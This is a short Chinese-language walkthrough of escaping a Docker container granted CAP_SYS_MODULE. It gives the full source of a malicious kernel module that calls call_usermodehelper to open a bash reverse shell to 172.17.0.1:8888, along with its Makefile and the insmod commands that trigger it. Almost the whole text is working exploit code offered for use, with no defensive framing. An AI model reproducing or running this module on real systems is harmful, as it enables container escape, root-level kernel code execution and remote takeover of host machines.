docker run -it --cap-add=SYS_MODULE ubuntu:18.04
cat /proc/self/status|grep Cap
然后使用capsh decode一下
capsh --decode=00000000a80525fb
发现有CAP_SYS_MODULE权限,那么直接往内核注入恶意module,我们直接在容器里面安装必备的东西
apt update&&apt install -y gcc make vim linux-headers-$(uname -r) kmod
exp.c
#include
MODULE_LICENSE("GPL");
char *argv[] = {
"/bin/bash",
"-c",
"bash -i >&/dev/tcp/172.17.0.1/8888 0>&1",
NULL
};
static int __init connect_back_init(void)
{
return call_usermodehelper(
argv[0],
argv,
NULL,
UMH_WAIT_EXEC // don't wait for program return status
);
}
static void __exit connect_back_exit(void)
{
}
module_init(connect_back_init);
module_exit(connect_back_exit);
Makefile
obj-m += exp.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) clean
make all编译一下
insmod exp.ko //就会反弹shell
rmmod exp.ko